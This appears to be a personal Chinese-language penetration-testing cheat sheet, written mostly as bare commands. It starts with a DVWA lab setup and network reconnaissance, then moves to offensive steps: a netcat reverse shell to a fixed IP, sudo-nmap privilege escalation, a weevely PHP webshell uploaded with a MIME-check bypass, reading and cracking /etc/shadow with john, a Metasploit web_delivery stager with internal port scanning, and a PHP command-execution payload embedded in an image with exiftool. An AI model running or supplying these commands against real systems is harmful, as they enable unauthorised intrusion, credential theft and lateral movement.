软件漏洞利用
dvwa漏洞利用环境
docker run --rm -it -p 8080:8080 vulnerables/web-dvwa
docker ps -a
docker stop id
扫描局域网的联网设备
sudo arp-scan --interface eth0 192.168.66.0/24
sudo arp-scan -l
扫描主机开启了哪些服务
sudo nmap -sVC -p- 192.168.66.106
worldpress扫描
wpscan --url xxx -e
burpsuite 设置代理抓包 edge添加burpsuite证书 https://blog.csdn.net/AD_CSY/article/details/117753145
指定字典的目录爆破
gobuster -u http://xxx.com/ -w path.txt
查找漏洞
searchploit linux
提权
nc 192.168.66.11 8888 -e /bin/sh //nc反弹一个shell到ip 8888端口
sudo -l //查看当前用户能执行什么文件
id 查看当前用户所属id (0是root)
nmap 提权
sudo nmap --script=./xxxx
xxxx内容:
os.execute("/bin/sh")
或者:nc 192.168.66.11 8888 -e /bin/sh
shell提权
php网站利用上传图片接口上传php木马
生成php木马
weevely generate <password> <path>
php文件前加GIF98 跳过mime类型为图片的验证
用命令行连接木马
weevely <URL> <password> [cmd]
file_upload 上传大马到网站其他目录 例如:/var/www/html/
提权:先用nc监听端口然后反弹shell
nc -lvp 5556
上传提权文件 linenum 扫描机器的信息
chmod +x linenum
./linenum
tail -c1G /etc/shadow
获取一个标准的shell
python -c “import pty;pty.spawn('/bin/bash')”
提取shadow文件 生成对应的hash文件,利用john进行相关破解
john --show hash.txt
内网渗透
拿到root权限 发现是dmz区机器 开始内网渗透
kali:
msfconsole
use exploit/multi/script/web_delivery
set lhost ip
set lport 9999
exploit
生成一段脚本
扫内网
use auxiliary/scanner/portscan/tcp
set rhosts 172.18.0.1-254
set threads 8
run
exiftool使用(生成图片马)
sudo apt install exiftool
exiftool poc.png -documentname="<?php echo exec(\$_POST['cmd'];)>" 生成php图片马